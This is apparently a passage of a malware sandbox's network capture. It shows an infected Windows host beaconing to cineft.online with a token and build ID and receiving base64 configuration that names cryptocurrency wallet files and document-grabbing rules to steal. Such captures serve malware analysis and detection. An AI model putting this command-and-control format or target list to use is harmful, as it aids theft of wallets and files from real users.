2024-12-14 23:00:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:05 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:05 UTC	717	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 23:00:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 23:00:07 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	50161	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:00:06 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----OHVS0RIMGLNYM79ZMGDJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:06 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 48 56 53 30 52 49 4d 47 4c 4e 59 4d 37 39 5a 4d 47 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 4f 48 56 53 30 52 49 4d 47 4c 4e 59 4d 37 39 5a 4d 47 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 48 56 53 30 52 49 4d 47 4c 4e 59 4d 37 39 5a 4d 47 44 4a 0d 0a 43 6f 6e 74 Data Ascii: ------OHVS0RIMGLNYM79ZMGDJContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------OHVS0RIMGLNYM79ZMGDJContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------OHVS0RIMGLNYM79ZMGDJCont
2024-12-14 23:00:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 23:00:07 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	50163	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:00:08 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----VKNG4E3OZMOZUAAASJ5P User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:08 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74 Data Ascii: ------VKNG4E3OZMOZUAAASJ5PContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------VKNG4E3OZMOZUAAASJ5PContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------VKNG4E3OZMOZUAAASJ5PCont
2024-12-14 23:00:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 23:00:09 UTC	536	IN	Data Raw: 32 30 63 0d 0a 5a 47 6c 7a 66 43 56 45 55 6b 6c 57 52 56 39 47 53 56 68 46 52 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 63 6d 56 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 64 58 4e 38 4a 56 56 54 52 56 4a 51 55 6b 39 47 53 55 78 46 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 71 63 47 63 73 4b 69 35 71 63 47 56 6e 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 78 45 5a 57 5a 68 64 57 78 30 66 43 56 45 54 30 4e 56 54 55 Data Ascii: 20cZGlzfCVEUklWRV9GSVhFRCVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8cmV8JURSSVZFX1JFTU9WQUJMRSVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8dXN8JVVTRVJQUk9GSUxFJVx8Ki50eHQsKi5qcGcsKi5qcGVnfDUwfGZhbHNlfCp3aW5kb3dzKnxEZWZhdWx0fCVET0NVTU

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	50164	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:00:11 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----5PPP8YCJW4E37Q1NGLXT User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:11 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 50 50 50 38 59 43 4a 57 34 45 33 37 51 31 4e 47 4c 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 50 38 59 43 4a 57 34 45 33 37 51 31 4e 47 4c 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 50 38 59 43 4a 57 34 45 33 37 51 31 4e 47 4c 58 54 0d 0a 43 6f 6e 74 Data Ascii: ------5PPP8YCJW4E37Q1NGLXTContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------5PPP8YCJW4E37Q1NGLXTContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------5PPP8YCJW4E37Q1NGLXTCont
2024-12-14 23:00:12 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 23:00:12 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	50166	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:00:12 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JWTR1NG4OZUAAASR9HVA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:12 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 57 54 52 31 4e 47 34 4f 5a 55 41 41 41 53 52 39 48 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 54 52 31 4e 47 34 4f 5a 55 41 41 41 53 52 39 48 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 54 52 31 4e 47 34 4f 5a 55 41 41 41 53 52 39 48 56 41 0d 0a 43 6f 6e 74 Data Ascii: ------JWTR1NG4OZUAAASR9HVAContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------JWTR1NG4OZUAAASR9HVAContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------JWTR1NG4OZUAAASR9HVACont
2024-12-14 23:00:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 23:00:13 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	50167	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:00:14 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AIWBA1DBSJM7YUS0ZCJ5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:14 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 49 57 42 41 31 44 42 53 4a 4d 37 59 55 53 30 5a 43 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 41 49 57 42 41 31 44 42 53 4a 4d 37 59 55 53 30 5a 43 4a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 49 57 42 41 31 44 42 53 4a 4d 37 59 55 53 30 5a 43 4a 35 0d 0a 43 6f 6e 74 Data Ascii: ------AIWBA1DBSJM7YUS0ZCJ5Content-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------AIWBA1DBSJM7YUS0ZCJ5Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------AIWBA1DBSJM7YUS0ZCJ5Cont
2024-12-14 23:00:15 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 23:00:15 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	50169	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:00:15 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----XT2DBS0R1N7YUA1DB1NY User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 23:00:15 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 58 54 32 44 42 53 30 52 31 4e 37 59 55 41 31 44 42 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 58 54 32 44 42 53 30 52 31 4e 37 59 55 41 31 44 42 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 58 54 32 44 42 53 30 52 31 4e 37 59 55 41 31 44 42 31 4e 59 0d 0a 43 6f 6e 74 Data Ascii: ------XT2DBS0R1N7YUA1DB1NYContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------XT2DBS0R1N7YUA1DB1NYContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------XT2DBS0R1N7YUA1DB1NYCont
2024-12-14 23:00:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 23:00:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 23:00:16 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	50170	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
